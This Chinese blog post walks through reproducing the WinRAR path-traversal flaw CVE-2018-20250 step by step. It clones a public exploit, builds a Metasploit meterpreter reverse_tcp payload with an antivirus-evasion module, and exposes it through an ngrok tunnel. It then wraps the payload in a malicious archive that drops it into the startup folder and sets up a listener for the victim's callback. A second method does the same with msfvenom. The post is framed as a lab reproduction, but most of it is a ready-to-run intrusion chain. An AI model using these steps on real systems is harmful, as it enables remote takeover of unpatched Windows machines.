您的位置:首页 > 编程语言

WinRAR远程代码执行漏洞复现(CVE-2018-20250)

2020-01-11 12:36 786 查看

文章目录

准备环境

WinRAR < 5.70 (UNACEV2.DLL还存在)
我使用的WinRAR版本: 5.61.0.0.
靶机:我使用的时win10 1903专业版
靶机条件:需要关掉安全中心,不然会把恶意文件删掉
WINRAR下载http://zdfans7.com/WinRAR_5737.zip

exp下载https://github.com/WyAtu/CVE-2018-20250.git

git clone https://github.com/WyAtu/CVE-2018-20250.git

CVE-2018-20250漏洞利用复现

1、下载WinRAR远程代码执行漏洞EXP
https://github.com/WyAtu/CVE-2018-20250
2、配置ngrok
https://www.ngrok.cc
选择服务器,我选择的是免费的ngrok服务器
开通一个免费的隧道转发代理,把ngrok隧道协议设置成 TCP,内网 IP 改成自己的 kali 里的内网 IP,内网端口随便填,不冲突就行。

3、下载ngrok脚本
我选择的是 Linux 64Bit版本 。先切换到sunny所在目录下再运行脚本。

./sunny clientid 隧道ID



4、使用msf生成payload

msfconsole
use evasion/windows/windows_defender_exe   # (选择msf5免杀模块)
show info   #(显示模块信息)
set filename WinRarPayloadTest.exe   #(设置Payload名字 )
set payload windows/meterpreter/reverse_tcp   #(设置Payload类型 )
set lhost free.idcfengye.com   #(设置上线地址,填写Ngrok映射出去的地址即可)
set lport 10975   #(设置监听端口,填写Ngrok映射出去的端口即可 )
run   #(生成Payload)


5、生成恶意文件

设置完之后,运行python3 exp.py 来生成恶意文件

python3 exp.py


6、对方解压

每当对方重启电脑时,启动项里的应用都会随之而启动

7、使用监听模块,并设置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcpset lhost 192.168.0.102 #(ngrok对应的ip)
set lport 45567 #(ngrok对应的端口)
run

另一种复现手法

1、下载WinRAR漏洞
exp下载https://github.com/WyAtu/CVE-2018-20250.git
2、利用msfbenom生成恶意文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444-f exe >./msf.exe


3、把生成的msf.exe复制到对应的exp里去

cp

打开exp.py并修改对应的地方

利用 python3 运行exp.py生成对应的压缩包名字

python3 exp.py


4、把生成的恶意文件发送给靶机
一旦靶机解压恶意文件

5、使用监听模块,并设置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcpset lhost 192.168.0.102
set lport 4444


运行run,监听靶机是否运行了恶意文件hi.exe

  • 点赞
  • 收藏
  • 分享
  • 文章举报
烦恼随风飘 发布了16 篇原创文章 · 获赞 4 · 访问量 1012 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: